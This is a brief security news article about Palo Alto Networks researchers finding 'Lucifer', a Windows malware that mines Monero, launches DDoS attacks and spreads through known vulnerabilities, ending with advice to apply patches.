Lucifer malware also mines Monero cryptocurrency on infected devices.
Palo Alto Networks’ Units 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer malware is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of “trivial-to-exploit nature” flaws most of which are either rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful as it performs crypto-jacking by dropping XMRig to mine for Monero cryptocurrency, connect to C&C server and enable self-propagation via exploiting multiple vulnerabilities along with launching credential brute-forcing.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation” sid the researchers in a blog post.
NSA exploits in action:
The malware developer named it Satan DDoS but since Satan Ransomware exists already, Palo Alto researchers chose to name it as Lucifer.
The good thing is that patches for weaponized security vulnerabilities are already available but hosts that haven’t been updated yet are still vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.